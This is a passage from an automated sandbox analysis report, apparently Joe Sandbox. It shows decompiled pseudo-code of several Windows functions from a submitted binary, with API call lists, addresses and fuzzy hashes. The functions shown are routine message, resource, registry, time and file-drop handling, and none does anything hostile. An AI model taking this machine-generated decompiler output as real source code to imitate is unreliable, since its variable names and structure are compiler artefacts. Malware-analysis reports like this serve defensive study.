				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
				if(E0041B29E(_t55 - 0x64,  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x134)) + 0x1c)), _t52, 0xa) != 0) {
					_t38 = _t55 - 0x60;
					if(_t52 != 0) {
						_t39 = swprintf(_t38, 0x50,  *(_t55 - 0x64), _t44,  *((intOrPtr*)(_t55 - 0x68)));
					} else {
						_t39 = swprintf(_t38, 0x50,  *(_t55 - 0x64), _t44);
					}
					if(_t39 > 0) {
						SendMessageA( *( *((intOrPtr*)(_t55 - 0x6c)) + 0x20), 0x362, 0, _t55 - 0x60);
					}
				}
				E004010B0( &(( *(_t55 - 0x64))[0xfffffffffffffffc]), _t49);
				return E00431B87(_t44, _t52, _t54);
			}










                  0x0041c667
                  0x0041c667
                  0x0041c66e
                  0x0041c673
                  0x0041c676
                  0x0041c67d
                  0x0041c67f
                  0x0041c68a
                  0x0041c698
                  0x0041c69a
                  0x0041c6a8
                  0x0041c6bb
                  0x0041c6bd
                  0x0041c6c2
                  0x0041c6df
                  0x0041c6c4
                  0x0041c6cb
                  0x0041c6d0
                  0x0041c6e9
                  0x0041c6fc
                  0x0041c6fc
                  0x0041c6e9
                  0x0041c708
                  0x0041c712

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0041C66E
                  • swprintf.LIBCMT ref: 0041C6CB
                    • Part of subcall function 00431BA5: __vsprintf_s_l.LIBCMT ref: 00431BB9
                  • swprintf.LIBCMT ref: 0041C6DF
                  • SendMessageA.USER32(00000362,00000362,00000000,?), ref: 0041C6FC
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: swprintf$H_prolog3_MessageSend__vsprintf_s_l
                  • String ID:
                  • API String ID: 2549095532-0
                  • Opcode ID: 8b0b3faeae5ae158317369ec41045ab26ed870bb68ff8ffac602cff6b4f0144d
                  • Instruction ID: 976522213fad21206c224ef94300dd4b8a2a06ebd09c969b271b5d7d8602737c
                  • Opcode Fuzzy Hash: 8b0b3faeae5ae158317369ec41045ab26ed870bb68ff8ffac602cff6b4f0144d
                  • Instruction Fuzzy Hash: 07115172A40308ABDB10EBE5CC86F9E77B9AF08754F114516F509AB291E738EA50CB18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00417991, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E00417991(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t24;
				void* _t29;
				void* _t31;
				struct HINSTANCE__* _t33;
				signed int _t35;
				signed int _t36;
				void* _t38;
				signed int* _t41;

				_push(__ecx);
				_push(_t29);
				_t38 = __ecx;
				_t43 =  *((intOrPtr*)(__ecx + 0x58));
				_t41 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t33 =  *(E0041F363(_t29, __ecx, _t41, _t43) + 0xc);
					_v8 = LoadResource(_t33, FindResourceA(_t33,  *(_t38 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t41 = LockResource(_v8);
				}
				_t31 = 1;
				if(_t41 != 0) {
					_t36 =  *_t41;
					if(_t41[0] != 0xffff) {
						_t24 = _t41[2] & 0x0000ffff;
						_t35 = _t41[3] & 0x0000ffff;
					} else {
						_t36 = _t41[3];
						_t24 = _t41[4] & 0x0000ffff;
						_t35 = _t41[5] & 0x0000ffff;
					}
					if((_t36 & 0x00001801) != 0 || _t24 != 0 || _t35 != 0) {
						_t31 = 0;
					}
				}
				if( *(_t38 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t31;
			}
















                  0x00417996
                  0x00417997
                  0x0041799a
                  0x0041799c
                  0x004179a3
                  0x004179a6
                  0x004179a9
                  0x004179b0
                  0x004179c7
                  0x004179c7
                  0x004179ce
                  0x004179d9
                  0x004179d9
                  0x004179dd
                  0x004179e0
                  0x004179e2
                  0x004179ed
                  0x004179fc
                  0x00417a00
                  0x004179ef
                  0x004179ef
                  0x004179f2
                  0x004179f6
                  0x004179f6
                  0x00417a0a
                  0x00417a16
                  0x00417a16
                  0x00417a0a
                  0x00417a1c
                  0x00417a21
                  0x00417a21
                  0x00417a2d

                  APIs
                  • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004179B9
                  • LoadResource.KERNEL32(?,00000000), ref: 004179C1
                  • LockResource.KERNEL32(00000000), ref: 004179D3
                  • FreeResource.KERNEL32(00000000), ref: 00417A21
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Resource$FindFreeLoadLock
                  • String ID:
                  • API String ID: 1078018258-0
                  • Opcode ID: b14f08c6746f0f8a09568c20fccbb53318ac3f839cc62215ab2f70fbb9b9f7ba
                  • Instruction ID: c50122b17c60c619c427763e47db6dbd252dbfe1e907e821626c2a7f4070538e
                  • Opcode Fuzzy Hash: b14f08c6746f0f8a09568c20fccbb53318ac3f839cc62215ab2f70fbb9b9f7ba
                  • Instruction Fuzzy Hash: CB110475100750EFEB208F96C848AFBB7B4FF04795F10842AE84253680D778EE94D794
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00415695, Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E00415695(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t44;
				void* _t46;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;

				_t54 = __eflags;
				_t47 = __ecx;
				_t45 = __ebx;
				_push(4);
				E00431A9B(E0044B2CF, __ebx, __edi, __esi);
				_t52 = __ecx;
				 *((intOrPtr*)(_t53 - 0x10)) = __ecx;
				E00415F8E(__ebx, __ecx, __edi, __ecx, _t54);
				 *((intOrPtr*)(_t53 - 4)) = 0;
				 *_t52 = 0x451d64;
				_t55 =  *((intOrPtr*)(_t53 + 8));
				if( *((intOrPtr*)(_t53 + 8)) == 0) {
					 *((intOrPtr*)(_t52 + 0x50)) = 0;
				} else {
					_t44 = E00433CCF( *((intOrPtr*)(_t53 + 8)));
					_pop(_t47);
					 *((intOrPtr*)(_t52 + 0x50)) = _t44;
				}
				_t46 = E0041F363(_t45, 0, _t52, _t55);
				_t56 = _t46;
				if(_t46 == 0) {
					L4:
					E00406436(_t46, _t47, 0, _t52, _t56);
				}
				_t7 = _t46 + 0x74; // 0x74
				_t47 = _t7;
				_t37 = E00409F26(_t46, _t7, 0, _t52, _t56);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t52;
				 *((intOrPtr*)(_t52 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t52 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t46 + 4)) = _t52;
				 *((short*)(_t52 + 0x92)) = 0;
				 *((short*)(_t52 + 0x90)) = 0;
				 *((intOrPtr*)(_t52 + 0x44)) = 0;
				 *((intOrPtr*)(_t52 + 0x7c)) = 0;
				 *((intOrPtr*)(_t52 + 0x64)) = 0;
				 *((intOrPtr*)(_t52 + 0x68)) = 0;
				 *((intOrPtr*)(_t52 + 0x54)) = 0;
				 *((intOrPtr*)(_t52 + 0x60)) = 0;
				 *((intOrPtr*)(_t52 + 0x88)) = 0;
				 *((intOrPtr*)(_t52 + 0x58)) = 0;
				 *((intOrPtr*)(_t52 + 0x48)) = 0;
				 *((intOrPtr*)(_t52 + 0x8c)) = 0;
				 *((intOrPtr*)(_t52 + 0x80)) = 0;
				 *((intOrPtr*)(_t52 + 0x84)) = 0;
				 *((intOrPtr*)(_t52 + 0x70)) = 0;
				 *((intOrPtr*)(_t52 + 0x74)) = 0;
				 *((intOrPtr*)(_t52 + 0x94)) = 0;
				 *((intOrPtr*)(_t52 + 0x9c)) = 0;
				 *((intOrPtr*)(_t52 + 0x5c)) = 0;
				 *((intOrPtr*)(_t52 + 0x6c)) = 0;
				 *((intOrPtr*)(_t52 + 0x98)) = 0x200;
				return E00431B73(_t52);
			}









                  0x00415695
                  0x00415695
                  0x00415695
                  0x00415695
                  0x0041569c
                  0x004156a1
                  0x004156a3
                  0x004156a6
                  0x004156ad
                  0x004156b0
                  0x004156b6
                  0x004156b9
                  0x004156c9
                  0x004156bb
                  0x004156be
                  0x004156c3
                  0x004156c4
                  0x004156c4
                  0x004156d1
                  0x004156d3
                  0x004156d5
                  0x004156d7
                  0x004156d7
                  0x004156d7
                  0x004156dc
                  0x004156dc
                  0x004156df
                  0x004156e6
                  0x00000000
                  0x00000000
                  0x004156e8
                  0x004156f1
                  0x004156fa
                  0x004156fd
                  0x00415702
                  0x00415709
                  0x00415710
                  0x00415713
                  0x00415716
                  0x00415719
                  0x0041571c
                  0x0041571f
                  0x00415722
                  0x00415728
                  0x0041572b
                  0x0041572e
                  0x00415734
                  0x0041573a
                  0x00415740
                  0x00415743
                  0x00415746
                  0x0041574c
                  0x00415752
                  0x00415755
                  0x00415758
                  0x00415769

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041569C
                    • Part of subcall function 00415F8E: __EH_prolog3.LIBCMT ref: 00415F95
                  • __strdup.LIBCMT ref: 004156BE
                  • GetCurrentThread.KERNEL32 ref: 004156EB
                  • GetCurrentThreadId.KERNEL32 ref: 004156F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CurrentH_prolog3Thread$__strdup
                  • String ID:
                  • API String ID: 4206445780-0
                  • Opcode ID: cac488b5aa484b3029be186aead16653baf6d1f59e1c01b3dba40b030be7ba0c
                  • Instruction ID: 7fb29538a6b4f40729483b379fb8af2d26115c614417515ddc3c19090b151fb4
                  • Opcode Fuzzy Hash: cac488b5aa484b3029be186aead16653baf6d1f59e1c01b3dba40b030be7ba0c
                  • Instruction Fuzzy Hash: 07218CB0801B40CFC7219F6A814569AFAF4BFA4704F10891FE5AAC7722DBB8A545CF49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004265DF, Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E004265DF(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x463404; // 0x38a11573
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					swprintf( &_v24, 0x10, 0x452000, _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(_t30 + 0x68));
				} else {
					_t30 = E0042652C(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E00430650(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}














                  0x004265df
                  0x004265e7
                  0x004265ee
                  0x004265f2
                  0x004265f6
                  0x004265fd
                  0x00426600
                  0x00426640
                  0x00426651
                  0x00426602
                  0x00426608
                  0x0042660c
                  0x0042661a
                  0x00426621
                  0x00426623
                  0x0042662d
                  0x0042662d
                  0x0042660c
                  0x00426665

                  APIs
                  • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 0042661A
                  • RegCloseKey.ADVAPI32(00000000), ref: 00426623
                  • swprintf.LIBCMT ref: 00426640
                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00426651
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClosePrivateProfileStringValueWriteswprintf
                  • String ID:
                  • API String ID: 22681860-0
                  • Opcode ID: b86b5b292ec0335bd37f35b857a2c661ef0f4caf61ce93286ff9f9638cd41884
                  • Instruction ID: e4b09b4b087a4c94818457906bb1b79e27778f0661a387acb9e5ce4406507e57
                  • Opcode Fuzzy Hash: b86b5b292ec0335bd37f35b857a2c661ef0f4caf61ce93286ff9f9638cd41884
                  • Instruction Fuzzy Hash: A5010472600218BBD7109F659C46FBFB7ACEF48714F51042BFA00A3181DAB8ED018768
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00411046, Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00411046(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t14;
				intOrPtr* _t19;
				void* _t20;

				_t21 = __ecx;
				_t19 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x128))() != 0) {
					_t21 = __ecx;
					 *((intOrPtr*)( *__ecx + 0x188))();
				}
				SendMessageA( *(_t19 + 0x20), 0x1f, 0, 0);
				E0040F918(_t19, _t21,  *(_t19 + 0x20), 0x1f, 0, 0, 1, 1);
				_t22 = _t19;
				_t20 = E004105B2(_t19, _t19, 0);
				_t26 = _t20;
				if(_t20 == 0) {
					E00406436(_t20, _t22, 0, SendMessageA, _t26);
				}
				SendMessageA( *(_t20 + 0x20), 0x1f, 0, 0);
				E0040F918(_t20, _t22,  *(_t20 + 0x20), 0x1f, 0, 0, 1, 1);
				_t14 = GetCapture();
				if(_t14 != 0) {
					return SendMessageA(_t14, 0x1f, 0, 0);
				}
				return _t14;
			}









                  0x00411046
                  0x0041104a
                  0x00411057
                  0x0041105b
                  0x0041105d
                  0x0041105d
                  0x00411072
                  0x0041107f
                  0x00411084
                  0x0041108b
                  0x0041108d
                  0x0041108f
                  0x00411091
                  0x00411091
                  0x0041109d
                  0x004110aa
                  0x004110af
                  0x004110b7
                  0x00000000
                  0x004110be
                  0x004110c3

                  APIs
                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00411072
                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 0041109D
                  • GetCapture.USER32 ref: 004110AF
                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004110BE
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$Capture
                  • String ID:
                  • API String ID: 1665607226-0
                  • Opcode ID: 118744c1a2b180471df96bfcb67b41c57b21864dd20d526ec31da897e524b114
                  • Instruction ID: 17e571b5f7ff4c9ef8489950eafba025f931e03d8fe3bfc599a458d3e8fa3cf5
                  • Opcode Fuzzy Hash: 118744c1a2b180471df96bfcb67b41c57b21864dd20d526ec31da897e524b114
                  • Instruction Fuzzy Hash: 640175317402947BDB301B638CCDFDB3E7AEBCAB50F110079B705AA1E7C9A54880D664
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042E37E, Relevance: 6.1, APIs: 4, Instructions: 54timeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E0042E37E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* _a4, struct _FILETIME* _a8) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				void* __ebp;
				int _t23;
				int _t25;
				void* _t38;
				void* _t40;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t30 = __ebx;
				_t44 = _a8;
				if(_a8 == 0) {
					E00406436(__ebx, __ecx, __edi, __esi, _t44);
				}
				_push(_t40);
				_v28.wYear = E0042E146();
				_v28.wMonth = E0042E169();
				_v28.wDay = E0042E188();
				_v28.wHour = E0042E1A6();
				_v28.wMinute = E0042E1C5();
				_v28.wSecond = E0042E1E4();
				_v28.wMilliseconds = 0;
				_t23 = SystemTimeToFileTime( &_v28,  &_v12);
				_t42 = GetLastError;
				if(_t23 == 0) {
					E0042EAA8(_t30, _t38, _t39, GetLastError, GetLastError(), 0);
				}
				_t25 = LocalFileTimeToFileTime( &_v12, _a8);
				if(_t25 == 0) {
					_t25 = E0042EAA8(_t30, _t38, _t39, _t42, GetLastError(), _t25);
				}
				return _t25;
			}










                  0x0042e37e
                  0x0042e37e
                  0x0042e37e
                  0x0042e37e
                  0x0042e386
                  0x0042e38a
                  0x0042e38c
                  0x0042e38c
                  0x0042e391
                  0x0042e39e
                  0x0042e3a9
                  0x0042e3b4
                  0x0042e3bf
                  0x0042e3ca
                  0x0042e3d3
                  0x0042e3d9
                  0x0042e3e5
                  0x0042e3eb
                  0x0042e3f3
                  0x0042e3fa
                  0x0042e3fa
                  0x0042e406
                  0x0042e40e
                  0x0042e414
                  0x0042e414
                  0x0042e41b

                  APIs
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0042E3E5
                  • GetLastError.KERNEL32(00000000), ref: 0042E3F7
                  • LocalFileTimeToFileTime.KERNEL32(?,00000000), ref: 0042E406
                  • GetLastError.KERNEL32(00000000), ref: 0042E411
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Time$File$ErrorLast$Exception@8H_prolog3LocalSystemThrow
                  • String ID:
                  • API String ID: 821146650-0
                  • Opcode ID: 01c99723038ad47921689631886dd98cb9011c0b6efba3e1e3db2276f9bfe786
                  • Instruction ID: 7f314973e1ded6b7ef5a961ee441c8429dab474b5b76dc5320eba2664e5a75b7
                  • Opcode Fuzzy Hash: 01c99723038ad47921689631886dd98cb9011c0b6efba3e1e3db2276f9bfe786
                  • Instruction Fuzzy Hash: 6A111E25F10229A7DF10BBF79C055AE77BDAF44718F80506BA901A7351EA788A1087DD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040918B, Relevance: 6.1, APIs: 4, Instructions: 53fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 73%
                  			E0040918B(void* __ecx, intOrPtr __edx, void* __eflags, void* _a4) {
				signed int _v8;
				char _v268;
				signed int _v272;
				int _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t18;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t38;
				void* _t39;
				intOrPtr* _t40;
				intOrPtr _t41;
				intOrPtr _t44;
				signed int _t48;
				void* _t51;

				_t51 = __eflags;
				_t38 = __edx;
				_t33 = __ecx;
				_t46 = _t48;
				_t18 =  *0x463404; // 0x38a11573
				_v8 = _t18 ^ _t48;
				_t31 = _a4;
				_push(_t39);
				E0040EE3C(_t31, _t33, SetActiveWindow( *(__ecx + 0x20)));
				_v276 = DragQueryFileA(_t31, 0xffffffff, 0, 0);
				_t24 = E0041F363(_t31, _t39, DragQueryFileA, _t51);
				_v272 = _v272 & 0x00000000;
				_t40 =  *((intOrPtr*)(_t24 + 4));
				if(_v276 > 0) {
					do {
						DragQueryFileA(_t31, _v272,  &_v268, 0x104);
						 *((intOrPtr*)( *_t40 + 0x88))( &_v268);
						_v272 = _v272 + 1;
						_t24 = _v272;
					} while (_v272 < _v276);
				}
				DragFinish(_t31);
				_pop(_t41);
				_pop(_t44);
				_pop(_t32);
				return E00430650(_t24, _t32, _v8 ^ _t46, _t38, _t41, _t44);
			}





















                  0x0040918b
                  0x0040918b
                  0x0040918b
                  0x0040918e
                  0x00409196
                  0x0040919d
                  0x004091a1
                  0x004091a5
                  0x004091b2
                  0x004091c6
                  0x004091cc
                  0x004091d1
                  0x004091df
                  0x004091e2
                  0x004091e4
                  0x004091f7
                  0x00409204
                  0x0040920a
                  0x00409210
                  0x00409216
                  0x004091e4
                  0x0040921f
                  0x00409228
                  0x00409229
                  0x0040922c
                  0x00409233

                  APIs
                  • SetActiveWindow.USER32(?), ref: 004091AB
                  • DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 004091C4
                  • DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 004091F7
                  • DragFinish.SHELL32(?), ref: 0040921F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Drag$FileQuery$ActiveFinishWindow
                  • String ID:
                  • API String ID: 892977027-0
                  • Opcode ID: 3d032a88417c343d42d2e43863a739bd58ef8c9bb5453b8cbdf58d110f34be10
                  • Instruction ID: 0dbc43127ea2ce8ae02b0a4d7d8f7e2c132127b2c2e01dcd9ff7c6f5005a244b
                  • Opcode Fuzzy Hash: 3d032a88417c343d42d2e43863a739bd58ef8c9bb5453b8cbdf58d110f34be10
                  • Instruction Fuzzy Hash: E011A375A00118ABCB109F65CC45FDDB7B8FB59314F1045EAE559A3291CBB4AE808F94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00428E59, Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E00428E59(void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t9;
				void* _t11;
				int _t13;
				void* _t23;
				void* _t29;
				intOrPtr* _t31;
				void* _t33;
				void* _t35;

				_t29 = __edx;
				_push(__ecx);
				_t23 = __ecx;
				_t9 = E00404461(__eflags, 0x10);
				_t37 = _t9;
				if(_t9 == 0) {
					_t31 = 0;
					__eflags = 0;
				} else {
					_t31 = E00428E3A(_t9, _t37);
				}
				_t11 = GetCurrentProcess();
				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
				_t35 = _t33;
				if(_t13 == 0) {
					if(_t31 != 0) {
						 *((intOrPtr*)( *_t31 + 4))(1);
					}
					E0042EAA8(_t23, _t29, _t31, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t31 + 4)) = _v8;
				 *((intOrPtr*)(_t31 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t31;
			}















                  0x00428e59
                  0x00428e5e
                  0x00428e63
                  0x00428e65
                  0x00428e6b
                  0x00428e6d
                  0x00428e7a
                  0x00428e7a
                  0x00428e6f
                  0x00428e76
                  0x00428e76
                  0x00428e8d
                  0x00428e96
                  0x00428e9c
                  0x00428e9f
                  0x00428ea3
                  0x00428eab
                  0x00428eab
                  0x00428eb8
                  0x00428eb8
                  0x00428ec0
                  0x00428ec6
                  0x00428ece

                  APIs
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00428E8D
                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00428E93
                  • DuplicateHandle.KERNEL32(00000000), ref: 00428E96
                  • GetLastError.KERNEL32(?), ref: 00428EB1
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                  • String ID:
                  • API String ID: 3704204646-0
                  • Opcode ID: 9da527475a3e1387b3d6d09f6d7e226383096d634adb75a74a0ecf538e676cf5
                  • Instruction ID: af5f4325da4a8d9e4f0321186dcae96371d0d4a3212ff4cde42e699575839eef
                  • Opcode Fuzzy Hash: 9da527475a3e1387b3d6d09f6d7e226383096d634adb75a74a0ecf538e676cf5
                  • Instruction Fuzzy Hash: 4201BC35700210ABDB10ABA6EC49F1E7BACFBC4750F55846AB904CB291DB74DC018B64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403AF0, Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00403AF0(intOrPtr* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t24;
				void* _t26;
				void* _t33;
				intOrPtr* _t35;

				_t35 = __ecx;
				E0041D1CE(_t26, __ecx, __edx, _t33, __ecx, __eflags);
				 *_t35 = 0x44f12c;
				 *((intOrPtr*)(_t35 + 0x5c)) = 0;
				 *((intOrPtr*)(_t35 + 0x58)) = 0;
				 *((intOrPtr*)(_t35 + 0x54)) = 0;
				 *((intOrPtr*)(_t35 + 0x60)) = 0;
				 *((intOrPtr*)(_t35 + 0x64)) = 0;
				 *((intOrPtr*)(_t35 + 0x68)) = 5;
				 *((intOrPtr*)(_t35 + 0x6c)) = 0x8003;
				 *((intOrPtr*)(_t35 + 0x9c)) = CreateEventA(0, 0, 0, 0);
				 *((intOrPtr*)(_t35 + 0xa0)) = CreateEventA(0, 1, 1, 0);
				 *((intOrPtr*)(_t35 + 0xa4)) = CreateEventA(0, 0, 0, 0);
				_t24 = CreateEventA(0, 0, 0, 0);
				 *((intOrPtr*)(_t35 + 0x84)) =  *((intOrPtr*)(_t35 + 0x9c));
				 *(_t35 + 0xa8) = _t24;
				 *(_t35 + 0x90) = _t24;
				 *((intOrPtr*)(_t35 + 0x70)) = 0;
				 *((intOrPtr*)(_t35 + 0x88)) =  *((intOrPtr*)(_t35 + 0xa0));
				 *((intOrPtr*)(_t35 + 0x8c)) =  *((intOrPtr*)(_t35 + 0xa4));
				return _t35;
			}










                  0x00403af3
                  0x00403af5
                  0x00403b06
                  0x00403b0c
                  0x00403b0f
                  0x00403b12
                  0x00403b15
                  0x00403b18
                  0x00403b1b
                  0x00403b22
                  0x00403b31
                  0x00403b3d
                  0x00403b49
                  0x00403b4f
                  0x00403b5d
                  0x00403b69
                  0x00403b6f
                  0x00403b76
                  0x00403b79
                  0x00403b7f
                  0x00403b89

                  APIs
